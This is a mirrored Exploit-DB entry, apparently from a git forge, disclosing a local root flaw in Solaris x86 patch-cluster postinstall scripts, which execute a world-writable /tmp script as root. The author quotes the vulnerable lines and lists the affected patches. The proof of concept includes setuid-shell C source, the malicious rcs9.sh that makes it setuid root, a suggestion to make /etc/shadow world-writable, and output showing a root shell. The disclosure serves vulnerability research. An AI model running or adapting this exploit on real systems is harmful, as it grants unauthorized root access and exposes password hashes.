bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux_x86/local/26709.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

66 lines
No EOL
2.2 KiB
Text
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Solaris Recommended Patch Cluster 6/19 local root on x86
Larry W. Cashdollar
7/3/2013
@_larry0
If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.
Local root:
Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.
./144751-01/SUNWos86r/install/postinstall
782 if [ -s /tmp/disketterc.d/rcs9.sh ] 783 then 784 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 785 fi
Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?
804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs) 805 TMPFILE=/tmp/ncrstmp 806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFIL E 807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases
./141445-09/SUNWos86r/install/postinstall
656 if [ -s /tmp/disketterc.d/rcs9.sh ] 657 then 658 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 659 fi
Well, it looks like you've got a few chances to abuse it:
larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \; ./144501-19/SUNWos86r/install/postinstall ./141445-09/SUNWos86r/install/postinstall ./142059-01/SUNWos86r/install/postinstall ./147148-26/SUNWos86r/install/postinstall ./127128-11/SUNWos86r/install/postinstall ./148889-03/SUNWos86r/install/postinstall ./142910-17/SUNWos86r/install/postinstall ./144751-01/SUNWos86r/install/postinstall
Psuedo PoC:
Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.
chmod 666 /etc/shadow would be easy.
PoC:
larry@slowaris:~$ cat setuid.c
#include
#include
int
main (void)
{
char *shell[2];
shell[0] = "sh";
shell[1] = NULL;
setregid (0, 0);
setreuid (0, 0);
execve ("/bin/sh", shell, NULL);
return(0);
}
gcc -o /tmp/r00t setuid.c
larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t
After patches have been applied:
larry@slowaris:~$ /tmp/r00t
# id
uid=0(root) gid=0(root)
Reference in a new issue View git blame Copy permalink